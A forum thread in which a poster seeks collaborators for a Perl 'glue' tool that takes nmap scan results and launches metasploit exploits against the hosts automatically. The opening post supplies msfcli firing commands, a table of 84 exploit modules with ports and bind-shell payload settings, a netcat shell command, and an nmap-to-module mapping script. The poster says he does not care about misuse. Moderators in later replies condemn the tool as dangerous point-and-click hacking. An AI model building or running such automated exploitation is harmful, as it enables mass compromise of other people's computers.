nmap and metasploit glue project

  1. #1

    This is an attempt to glue nmap and metasploit together, making metasploit work automatically by getting information from nmap.
    I can't handle it alone, so any help would be much appreciated.
    What can you do?
    You can offer suggestions, write some code, find programs.
    Suggestions: I'm open to any suggestions, so don't hesitate to speak your mind.

    Write some code: You don't have to be a programming guru or familiar with perl to help out.
    What bugs me the most is that I have to write very similar code many times.
    You can help me by writing some msfcli arguments for the appropriate exploits.
    The exploit's name is in the %exploits hash; next to it you'll see a comment on what arguments are required.
    So you can write something like this:
    Code:
    my $msfarg = `./msfcli maxdb_webdbm_get_overflow RHOST=$ip TARGET=0 PAYLOAD=win32_bind E`;
    If you see in the comment 'target 0-2' for example write the code this way:
    Code:
    for(0..2) {
    	my $msfarg = `./msfcli trackercam_phparg_overflow RHOST=$ip TARGET=$_ PAYLOAD=win32_bind E`;
    }
    If there is just one argument, for example 'target 0' or 'payload win32_bind', just do as it says:
    Code:
    my $msfarg = `./msfcli arkeia_agent_access RHOST=$ip TARGET=0 E`;
    'RHOST' and 'E' are constants: 'RHOST' always has the value '$ip', and E is the msfcli argument which means exploit.
    See the comment next to the exploit for what other arguments it requires.
    Feel free to ask me any question(s) (try to be very specific), either post here or e-mail me at ludakot[at]gmail.com (NO I WON'T TEACH YOU HOW TO HACK!@#*^%^#$)

    Find programs: You see all these exploits? Well, I guess I'll need each and every service they exploit.
    Don't just post a link to the developer's page like http://company.com. Try to find the exact version(s) the exploit works on.
    You can find this out when you open msfconsole and write 'info NameOfTheExploit'. For example:
    Code:
    msf > info apache_chunked_win32
    
          Name: Apache Win32 Chunked Encoding
         Class: remote
       Version: $Revision: 1.44 $
     Target OS: win32, win2000, winnt, win2003, winxp
      Keywords: apache
    Privileged: Yes
    Disclosure: Jun 19 2002
    
    Provided By:
        H D Moore <hdm [at] metasploit.com>
    
    Available Targets:
        Windows Generic Bruteforce
        Apache.org Build 1.3.9->1.3.19
        Apache.org Build 1.3.22/1.3.24
        Apache.org Build 1.3.19/1.3.24
        Apache.org Build 1.3.22
        Apache.org Build 1.3.17->1.3.24 (Windows 2000)
        Apache.org Build 1.3.17->1.3.24 (Windows NT 4.0)
    It would be awesome to find all these services in an appropriate version.
    Then I can figure out how to recognize the service remotely, hence making this glue program faster and more reliable.
    So I'd like you to post or e-mail me direct download links; that will surely save me a lot of time and frustration.

    Nothing will go unnoticed; everything you have contributed will be credited accordingly.
    You can download metasploit from http://metasploit.com or http://metasploit.org
    I tried to add all remote exploits that don't need to listen for connections. Apparently I missed some.
    My 'grep' relied on m/The\starget\sport\S\S\s(\d{1,5})/ but some exploits had something different in their info, for example 'The samba port', 139'.
    If you feel like it, please post the rest of the NON LISTENING exploits with their name and default port so I can add them to the hash.
    Or perhaps, if you'd like this program to use an exploit that isn't in the metasploit framework, post the exploit's code and I'll add it.

    The exploits
    Code:
    my %exploits = ( # 84 
    	"altn_webadmin" => 			"1000", # target 0-3, payload win32_bind	
    	"backupexec_agent" => 		"10000",# payload win32_bind 
    	"calicserv_getconfig" => 		"10202",# target 0, payload win32_bind
    	"calicclnt_getconfig" => 		"10203",# target 0, payload win32_bind
    	"seattlelab_mail_55" => 		"110",  # payload win32_bind 
    	"msrpc_dcom_ms03_026" => 		"135",  # payload win32_bind  
    	"ms05_039_pnp" => 			"139",  # target 0-6, payload win32_bind
    	"samba_nttrans" =>			"139",  # target 0, payload linux_ia32_bind
    	"samba_trans2open" =>		"139",  # target 0-1, payload 0 linux_ia32_bind, 1 bsd_ia32_bind
    	"samba_trans2open_osx" => 		"139",  # payload osx_ppc_bind
    	"samba_trans2open_solsparc" =>		"139",  # target 0-1, payload solaris_sparc_bind
    	"uow_imap4_lsub" => 			"143",  # target 0-5, payload 0,2,3 linux_ia32_bind, 1,4,5 bsd_ia32_bind
    	"eudora_imap" => 			"143",  # payload win32_bind
    	"gnu_mailutils_imap4d" => 		"143",  # payload linux_ia32_bind
    	"mailenable_imap" => 			"143",  # target 0, payload win32_bind
    	"mdaemon_imap_cram_md5" => 		"143",  # target 0, payload win32_bind
    	"uow_imap4_copy" => 			"143",  # target 0-4, payload 0,3 linux_ia32_bind, 1,2,4 bsd_ia32_bind 
    	"mssql2000_preauthentication" => 	"1433", # payload win32_bind 
    	"mssql2000_resolution" => 		"1434", # payload win32_bind
    	"zenworks_desktop_agent" =>	 	"1761", # payload win32_bind
    	"bakbone_netvault_heap" => 		"20031",# target 0-1, payload win32_bind
    	"wsftp_server_503_mkd" => 		"21",   # payload win32_bind, user anonymous, pass a@a 
    	"freeftpd_user" => 			"21",   # target 0-3, payload win32_bind 
    	"netterm_netftpd_user_overflow" => 	"21",   # payload win32_bind
    	"slimftpd_list_concat" => 		"21",   # payload win32_bind
    	"servu_mdtm_overflow" => 		"21",   # user anonymous, pass a@a, payload win32_bind
    	"warftpd_165_user" => 			"21",   # target 0-2, payload win32_bind 
    	"globalscapeftp_user_input" => 		"21",   # payload win32_bind
    	"3com_3cdaemon_ftp_overflow" => 	"21",   # target 0-2, payload win32_bind
    	"oracle9i_xdb_ftp" => 			"2100", # payload win32_bind, 
    	"oracle9i_xdb_ftp_pass" => 		"2100", # target 0, payload win32_bind 
    	"msmq_deleteobject_ms05_017" => 	"2103", # payload win32_bind, hname <STDIN>
    	"solaris_ttyprompt" => 			"23",   # payload cmd_interact
    	"wmailserver_smtp" => 			"25",   # target 0-2, payload win32_bind
    	"ypops_smtp" => 			"25",   # payload win32_bind 
    	"exchange2000_xexch50" => 		"25",   # payload win32_bind 
    	"openview_connectednodes_exec" => 	"3443", # payload cmd_irix_bind, dir <STDIN> 
    	"imail_ldap" => 			"389",  # target 0-1, payload win32_bind 
    	"cacam_logsecurity_win32" => 		"4105", # payload win32_bind
    	"cabrightstor_disco_servicepc" => 	"41523",# target 0, payload win32_bind 
    	"cabrightstor_disco" => 		"41524",# target 0, payload win32_bind 
    	"wins_ms04_045" => 			"42",   # target 0, payload win32_bind
    	"windows_ssl_pct" => 			"443",  # target 0-6, payload win32_bind
    	"kerio_auth" => 			"44334",# target 0-2, payload win32_bind
    	"sentinel_lm7_overflow" => 		"5093", # target 0-4, payload win32_bind
    	"cabrightstor_uniagent" => 		"6050", # payload win32_reverse_ord, lhost 127.0.0.1
    	"cabrightstor_sqlagent" => 		"6070", # target 0-8, payload win32_bind
    	"backupexec_ns" => 			"6101", # target 0-1, payload win32_bind,
    	"backupexec_registry" => 		"6106", # target 1,
    	"arkeia_agent_access" => 		"617",  # target 0, 
    	"arkeia_type77_macos" => 		"617",  # target 0, payload osx_ppc_bind, 
    	"arkeia_type77_win32" => 		"617",  # target 0-10, payload win32_bind, 
    	"futuresoft_tftpd" => 			"69",   # target 0-3, payload win32_bind, 
    	"ut2004_secure_linux" => 		"7787", # target 0, payload linux_ia32_bind, 
    	"ut2004_secure_win32" => 		"7787", # target 0, payload win32_bind, 
    	"iis_w3who_overflow" => 		"80",   # target 0-1, payload win32_bind, url <STDIN>
    	"iis_nsiislog_post" => 			"80",   # payload win32_bind
    	"php_vbulletin_template" => 		"80",   # payload cmd_irix_bind, rpath <STDIN>
    	"awstats_configdir_exec" => 		"80",   # payload cmd_irix_bind, dir <STDIN>
    	"minishare_get_overflow" => 		"80",   # target 0-8, payload win32_bind, 
    	"phpbb_highlight" => 			"80",   # payload cmd_irix_bind, phpbbroot <STDIN>
    	"rsa_iiswebagent_redirect" => 		"80",   # target 0-1, payload win32_bind, url <STDIN>
    	"iis50_printer_overflow" => 		"80",   # payload win32_bind 
    	"warftpd_165_pass" => 			"80",   # payload win32_bind
    	"bluecoat_winproxy" => 			"80",   # target 0, payload win32_bind
    	"apache_chunked_win32" => 		"80",   # target 0, payload win32_bind
    	"badblue_ext_overflow" => 		"80",   # payload win32_bind
    	"iis40_htr" => 				"80",   # target 0-2, payload win32_bind
    	"sambar6_search_results" => 		"80",   # target 0-1, payload win32_bind
    	"iis50_webdav_ntdll" => 		"80",   # payload win32_bind
    	"ia_webmail" => 			"80",   # payload win32_bind
    	"php_xmlrpc_eval" => 			"80",   # payload cmd_irix_bind, rpath <STDIN>
    	"lyris_attachment_mssql" => 		"80",   # payload cmd_generic, cmd nc -lnp 31337 -e cmd.exe\/bin/sh
    	"iis_source_dumper" => 			"80",   # target 0, rfile <STDIN>
    	"cacti_graphimage_exec" => 		"80",   # payload cmd_unix_reverse, dir <STDIN>, lhost 127.0.0.1
    	"iis_fp30reg_chunked" => 		"80",   # target 0-2, payload win32_bind
    	"php_wordpress_lastpost" => 		"80",   # payload cmd_irix_bind, rpath <STDIN>
    	"barracuda_img_exec" => 		"8000", # payload cmd_unix_reverse, lhost 127.0.0.1, img <STDIN>
    	"shoutcast_format_win32" => 		"8000", # target 0-3, payload win32_reverse_ord, lhost 127.0.0.1
    	"icecast_header" => 			"8000", # payload win32_bind	
    	"edirectory_imonitor" => 		"8008", # target 0, payload win32_bind
    	"mailenable_auth_header" => 		"8080", # target 0, payload win32_bind
    	"oracle9i_xdb_http" => 			"8080", # target 0, payload win32_bind
    	"trackercam_phparg_overflow" => 	"8090", # target 0-2, payload win32_bind
    	"maxdb_webdbm_get_overflow" => 		"9999", # target 0, payload win32_bind
    );
    Oh silly me, I'm sorry I should have posted this in Programming Security. My apologies.
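    One way to do the nmap side of this, as an added example that is not part of the original post or of the project's code: it reads nmap grepable (-oG) output, joins the open TCP ports against a subset of the %exploits table above, and only reports which modules' 'info' targets need to be checked against the detected service version; the host, versions and the sample line are constructed, not real scan data.

```perl
use strict;
use warnings;

# Subset of the thread's %exploits table (module => default port),
# inverted to port => [modules] for lookup.
my %exploits = (
    "wsftp_server_503_mkd" => "21",  "servu_mdtm_overflow" => "21",
    "apache_chunked_win32" => "80",  "iis50_webdav_ntdll"  => "80",
    "samba_trans2open"     => "139", "ms05_039_pnp"        => "139",
    "mailenable_imap"      => "143",
);
my %by_port;
push @{ $by_port{ $exploits{$_} } }, $_ for sort keys %exploits;

# Constructed sample of one nmap -sV -oG line (host and versions made up).
my @nmap_lines = (
    "Host: 192.0.2.10 ()\tPorts: 21/open/tcp//ftp//WS_FTP Server 5.0.3/, "
  . "22/closed/tcp//ssh///, 80/open/tcp//http//Apache httpd 1.3.22/, "
  . "139/open/tcp//netbios-ssn//Samba smbd 2.2.x/\tIgnored State: closed (996)",
);

# Each Ports: entry is port/state/proto/owner/service/rpc/version/.
sub parse_nmap_line {
    my ($line) = @_;
    my ($host)  = $line =~ /^Host:\s+(\S+)/ or return;
    my ($ports) = $line =~ /Ports:\s+(.*?)(?:\t|$)/ or return;
    my @open;
    for my $entry (split /,\s*/, $ports) {
        my ($port, $state, $proto, undef, $service, undef, $version) = split m{/}, $entry;
        next unless defined $state && $state eq 'open' && $proto eq 'tcp';
        push @open, { port => $port, service => $service, version => $version // '' };
    }
    return ($host, \@open);
}

# Report only; the version must still be checked against the module's
# 'info' Available Targets before concluding anything about the host.
for my $line (@nmap_lines) {
    my ($host, $open) = parse_nmap_line($line) or next;
    for my $p (@$open) {
        my $mods = $by_port{ $p->{port} } or next;
        printf "%s:%s %s (%s) -> check info for: %s\n",
            $host, $p->{port}, $p->{service}, $p->{version}, join(', ', @$mods);
    }
}
```

    Feeding it a real -oG file is a matter of replacing @nmap_lines with the file's Host: lines; version strings that themselves contain commas would need a stricter split than the one shown.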

  2. #2
    thehorse13 (Master-Jedi-Pimps0r & Moderator)
    Join Date: Dec 2002; Location: Washington D.C. area; Posts: 2,883
    Let me be sure that I understand what I'm seeing here. You want to develop a mechanism that takes NMAP data and feeds it through metasploit in order to hammer vulnerabilities on target hosts?

    If this is the case, this sounds like the ultimate script-kiddie grinder tool. Point, click, fire. Rinse, spin, repeat.

    Have you considered the ramifications of such a tool?

    --Th13
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  3. #3
    Consequences? No, not really, I don't care actually. I think it would be a useful tool, scanning your lost boxes on your network to see if they are vulnerable in a short period of time. Plus I tend to learn a lot more about remote fingerprinting. But in any case you're right that a lot of 16 year olds will scan around and 'own' a lot of computers, but hey, that could contribute to making the internet safer in an ironic way.

  4. #4
    thehorse13 (Master-Jedi-Pimps0r & Moderator)
    Join Date: Dec 2002; Location: Washington D.C. area; Posts: 2,883
    One could argue that tools like Nessus do the same, however, they have a "safe scan" option and bill the product towards security professionals.

    Enabling skiddies tends to bend me the wrong way. A tool like you're proposing is extremely dangerous. If I were you, I'd be very careful on how you proceed. You may find yourself liable for its misuse.

    Originally posted by LudakoT
    'own' a lot of computers, but hey that could contribute making the internet safer in an ironic way.
    How do you figure that kiddies owning boxes makes the internet safer? I'm really asking you; it's not a rhetorical question or a snide comment.

    --Th13
    Our scars have the power to remind us that our past was real. -- Hannibal Lecter.
    Talent is God given. Be humble. Fame is man-given. Be grateful. Conceit is self-given. Be careful. -- John Wooden

  5. #5
    Super Moderator (Know-it-All Master Beaver)
    Join Date: Jan 2003; Posts: 3,914
    Originally posted here by LudakoT
    Consequences? No not really I don't care actually I think it would be a useful tool, scanning your lost boxes on your network see if they are vulnerable in short period of time. Plus I tend to learn a lot more about remote fingerprinting. But in any case you're right that a lot of 16 year olds will scan around and 'own' a lot of computers, but hey that could contribute making the internet safer in an ironic way.
    Hey Hey,

    You think this would be beneficial for a network to find lost boxes?? So you're obviously talking about corporate/enterprise networks... And you don't care about the consequences... This tells me a couple of things about you.

    1. You're not a security professional.
    2. You're definitely not over the age of 20.
    3. You really have no idea how an Enterprise Environment works..
    4. I highly doubt you work in IT, even at a helpdesk level.

    Enterprises do not run intense scans that not only hammer their boxes but could jeopardize them... You'd be out of a job if you randomly crashed boxes to know they exist. If you're finding lost boxes, the nmap scan alone will help you... it'll have found them, or the addition of Metasploit won't really be useful, because if nmap didn't find them... Metasploit won't..

    If you were truly into IT security and concerned you wouldn't be looking at a route like this. MSF is great.. but its exploit tree is severely lacking still... in that aspect it's still a very immature product. It's handy at times and quite useful occasionally... but things like UT2004 and even Futuresoft TFTPD exploits are not what your average Admin is looking for.

    An Admin is going to want to know if they're up to date on their MS Patches... If their software is running the "Enterprise Standard", if their primary daemons and servers (IIS, Apache, Exchange, Sendmail, etc) are open to any horrid vulns or if updates are available for that software. They're going to want a product like the nCircle IP360. Which can do that and more...

    Peace,
    HT
    IT Blog: .:Computer Defense:.
    PnCHd (Pronounced Pinched): Acronym - Point 'n Click Hacked. As in: "That website was pinched" or "The skiddie pinched my computer because I forgot to patch".